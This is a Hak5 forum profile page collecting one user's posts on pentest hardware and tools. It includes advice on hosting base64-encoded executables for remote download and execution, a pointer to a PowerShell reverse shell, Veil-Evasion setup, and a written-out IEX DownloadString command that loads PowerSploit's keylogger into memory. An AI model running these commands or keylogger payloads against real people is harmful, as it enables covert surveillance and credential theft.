Jump to content
Hak5 Forums

PoSHMagiC0de

Active Members
  • Content count

    439
  • Joined

  • Last visited

  • Days Won

    9

2 Followers

About PoSHMagiC0de

  • Rank
    Hak5 Pirate

Contact Methods

  • Website URL
    https://github.com/PoSHMagiC0de

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. PoSHMagiC0de

    build EXE on target machine... (hardcode some info)

    There is a way to do this in pure powershell without call csc since it is .net. You will have the option to compile to disk or in memory. Since I do most stuff in memory with reflections or add-type, I hardly use it. I have to look up the way for 2.0 Powershell but here is the "add-type" way. http://www.ingmarverheij.com/run-and-compile-net-code-in-res-workspace-manager-using-powershell/
  2. PoSHMagiC0de

    Good Free Hosting EXEs

    Instead of just giving the answer, the answer is the second answer here for handing binary files. I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there. https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64 The premise is this. You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host. You Posh script should download that contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it. If the file was text like a script you would user [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64. If you plan on using the .NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in. "$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.
  3. PoSHMagiC0de

    Loot Folder / ATTACKMODE HID STORAGE ISSUE

    Because it is not behaving like a USB storage device but like storage on a separate computer that is on the same, separate subnet as the victim.
  4. PoSHMagiC0de

    Loot Folder / ATTACKMODE HID STORAGE ISSUE

    Ahh, the Storage/USB issue again. Not really an issue, just the way USB storage works. Let us called the bashbunny the host for the USB storage and the PC it is connected to the client for simplicity sake. If the client mounts the usb storage (the attackmode storage) and the host makes changes then, the client will not see them. For those to be seen you could unmount and remount the storage (turning all attackmodes off and on again with attack mode and then attackmode storage). The storage has to be resynced. In linux this might be possible with the "sync" command but have not tried it. Usually during setup i do all the folder creation the host is going to do before setting the attackmode. Next, if the client writes or make changes to the storage, the guest may not see the changes until they are synced...or on windows the bunny has to be ejected before the host will see the changes. This is the explanation why some payloads that use storage and look for changes in the file done by the client are not seen so never complete. I think this topic has been beaten to death over the threads hehehe.
  5. PoSHMagiC0de

    Good Free Hosting EXEs

    Welp, you can always get a vps and host it. Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file. Download that string, convert back to bytes and then write to drive or memory and execute.
  6. PoSHMagiC0de

    John the RIpper

    Hashcat requires a GPU or a CPU that support ICD. The BB has neither so hashcat will not run. John would though but slow seeing the BB CPU is not the same as a laptop or desktop CPU. It will get very hot too. Best bet is to boot with a kali live USB on that machine, mount drive..if you can or crack drive with john. If server has GPU then install the drivers in the live environment and use hashcat.
  7. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    You might have to apt install python-crypto. If the pip install did not get it then it is an apt package you will need.
  8. PoSHMagiC0de

    Shell (via. PuTTY) "dir" and "ls" listing issues?

    Ahh, new to Linux and SSH? When you first SSH in you end up in the root user folder which is /root or "~/" If you notice your prompt for our first few commands it has "~#" proceeding it. You are in the root's home folder there or the current user's home folder which is root. After your "cd /tools" you may notice that prompt changed to "/tools#". You are in the tools folder off of the root folder..not root home folder. If you type "cd /" and do a ls you will see everything install on the root partition of the bunny. Pretty much when you SSH in, do not expect to see what you see when you are in arming mode on the bunny and browsing it like a USB stick. That is a mounted partition, not the root. You will also notice the udisk folder is empty. It is not mounted yet to view it. "udisk mount" will mount it and then you can view it under /root/udisk or "~/udisk" which will show your loot, payloads, etc folders. The main root partition is the system files for the bunny, mess up those and bunny no workie at all.
  9. PoSHMagiC0de

    Impacket's karmasmb.py info

    I figured out what my issue was. I was trying to use it like smbserver.py. All the path parameters have to be full paths, not relative. Also, explorer will not work right with it. I used Powershell to get the contents of the paths and was able to get them. Also if the extension is recongnized by Windows you can use the run line to get it like the txt file I pulled and it opened notepad to display it. So, it is working now. 🙂
  10. PoSHMagiC0de

    Impacket's karmasmb.py info

    Welp, it is my turn to ask a question. Been a minute hahaha. So, I once in awhile go through the impacket packages and mess with them from time to time and even go through their code (they are examples after all). One tool has me stumped as I have yet to get it going right. That is karmasmb.py. I know it is similar to smbserver.py but some differences. It takes a config file to resolve extensions and all that jazz. I have tried to use it like smbserver.py but get errors going to the folder on a windows machine though it does show a connection coming in on karmasmb just serves the wrong stuff and I end up if I just browse to it is a folder with a * in it. Tried the config file method too but getting same issues. I am curious in seeing how this module works. Anyone have a working example so I can get a feel of how it is configured and ran? Yeah, I looked online. I think there is a video of Mubix using it for an exploit from back in 2015 but he already had it configured and just ran it. 😐
  11. PoSHMagiC0de

    Reverse shell windows question

    It is from Nishang. Here is the link to a git that shows 2 different ones. believe he is using the bottom one. Change IP and port. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
  12. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    Oh crap, I didn't see you had ParrotOS installed. Yeah, prepare for the pain. I just saw Kali and figured you had Kali. What is hurting you here is Firejail. I used to run ParrotOS for about a year and then dropped it because they are really focused on anonymity which a lot of times break the pen tools. To fix certain pen tools and veil you have two choices. One, you can run veil tell firejail to not jail it (I forgot the commandline for that, might have to ask on the ParrotSec forums) or do what I did and removed firejail with apt remove --purge firejail Once you do that, you will have to redo veil but I would remove the git one if you got it just because the apt one didn't work. If you prefer the git one and have it rerun its installer again after you took care of firejail either by running the installer with the commandline to not firejail it or after you removed firejail.
  13. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    Okay, on my VM I did not have veil-evasion on I did the following and veil works. dpkg --add-architecture i386 apt update apt upgrade apt dist-upgrade apt autoremove reboot -n #above I updated everything because my VM was behind but made sure I had the i386 architecture added first. #after reboot and logon. apt update apt install wine apt install veil-evasion veil I told it to install with "Y" I reinstalled all the Windows apps for python, ruby, etc...overwriting when I had to. When done I was in veil and I created a regular https payload using phyperion and default pyinstaller. It got done with no errors. If you have not done so, make veil reinstall/reset so you can reinstall the dependencies. If having issues resetting. then apt remove --purge veil-evasion and then re apt install it. Now if you installed veil from git, well, you will have to figure out how to completely remove it to reinstall it or the one from apt.
  14. PoSHMagiC0de

    Powershell keylogger in seconds

    Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device. So, above I was trying to have you just jump on your test machine. Run powershell and just use the two line commands I put out. The first will download and launch get-keystokes function to memory for use. Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong but atleast you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work. Now if it does then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works.
  15. PoSHMagiC0de

    Powershell keylogger in seconds

    Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.
×